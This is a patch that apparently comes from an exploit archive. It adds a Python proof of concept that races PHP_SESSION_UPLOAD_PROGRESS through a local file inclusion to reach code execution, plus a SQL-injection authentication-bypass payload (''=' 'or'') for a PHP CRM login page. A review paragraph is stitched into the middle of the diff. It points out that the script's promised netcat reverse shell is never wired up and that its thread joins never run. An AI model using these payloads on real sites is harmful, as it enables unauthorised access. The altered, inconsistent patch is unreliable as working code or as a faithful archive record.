From f648cfe79356c848a1aac5652b7952cdc7ba2d70 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 28 Jul 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-07-28 2 changes to exploits/shellcodes PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
---
 exploits/php/webapps/50156.py | 66 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/50158.txt | 19 ++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 87 insertions(+)
 create mode 100755 exploits/php/webapps/50156.py
 create mode 100644 exploits/php/webapps/50158.txt
diff --git a/exploits/php/webapps/50156.py b/exploits/php/webapps/50156.py
new file mode 100755
index 000000000..65c8f2857
--- /dev/null
+++ b/exploits/php/webapps/50156.py
@@ -0,0 +1,66 @@
+# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
+# Date: 26/7/2021
+# Exploit Author: SiLvER | Faisal Alhadlaq
+# Tested on: PHP Version is 7.3.15-3
+# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat
+
+#!/usr/bin/python3
+"""
+Usage :
+
+python3 poc.p
+python3 poc.py https://xyz.xyz 192.168.1.15 1337
+
+"""
+import requests
+import threading
+import datetime
+import sys
+
+x = datetime.datetime.now()
+addSeconds = datetime.timedelta(0, 10)
+newDatetime = x + addSeconds
+
+def fuzz():
+ targetIP = sys.argv[1]
+ listnerIP = sys.argv[2]
+ listnerPORT = sys.argv[3]
+ global newDatetime
+ while True:
+ try:
+ if datetime.datetime.now() > newDatetime:
+ exit()
+ # proxies = {
+ # "http": "http://127.0.0.1:8080",
+ # "https": "https://127.0.0.1:8080",
+ # }
+ sessionName = "SiLvER"
+ url = targetIP
+ s = requests.Session()
+ cookies = {'PHPSESSID': sessionName}
+ files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, ''), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
+ # You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
+ params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
+ x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
+
+ except Exception as error:
+ print(error)
+ exit()
+def main():
+ print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
+ threads = []
+ for _ in range(20):
+ t = threading.Thread(target=fuzz)
+ t.start()
+ threads.append(t)
+ for thread in threads:
+ thread.join
+
+if __name__ == "__main__":
+ if len(sys.argv) < 4:
+ print("\n(-) Usage: {} ".format(sys.argv[0]))
+ print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
+ print("\n(=) By SiLvER \n")
+ exit()
+ else:
main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50158.txt b/exploits/php/webapps/50158.txt
new file mode 100644
index 000000000..a895a6aaf
--- /dev/null
+++ b/exploits/php/webapps/50158.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
+# Date: 27/07/2021
+# Exploit Author: Shafique_Wasta
+# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
+# Version: 1
+# Tested on: Windows 10/xampp
+
+# DESCRIPTION #
+
+# Customer relationship management system is vulnerable to Sql Injection Auth Bypass
+
+# Exploit Working:
+# 1. Visit on localhostcrm/customer/login.php
+# 2. You will see the login panel
+# 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.
+
+# Vulnerable URL :http://localhost/crm/customer/login.php
+# Payload: '=' 'or'
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index aeb4ab57d..dbc3b19a3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
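Review bot: `thread.join` in main() names the bound method without calling it, so the join loop does nothing and main() returns before the workers finish; it should read `thread.join()`. In fuzz(), `listnerIP` and `listnerPORT` are read from argv but never used, which contradicts the header comment's claim that the script returns a netcat reverse shell — either drop the two arguments or reword the header to say the script only issues the upload-progress requests. `exit()` inside a worker thread raises SystemExit, which the threading module swallows silently, so a plain `return` states the intent more clearly. The `#!/usr/bin/python3` shebang is only honoured on the first line of the file; placed after the header comments it has no effect. The usage strings appear to be missing their argument placeholders and the body's indentation is lost in this rendering, so both should be checked against the original file.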
@@ -44289,3 +44289,5 @@ id,file,description,date,author,type,platform,port
 50151,exploits/aspx/webapps/50151.py,"Microsoft SharePoint Server 2019 - Remote Code Execution (2)",2021-07-23,Podalirius,webapps,aspx,
 50154,exploits/windows/webapps/50154.py,"NoteBurner 2.35 - Denial Of Service (DoS) (PoC)",2021-07-26,stresser,webapps,windows,
 50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",2021-07-26,faisalfs10x,webapps,php,
+50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",2021-07-27,"Faisal Alhadlaq",webapps,php,
+50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",2021-07-27,Shafique_Wasta,webapps,php,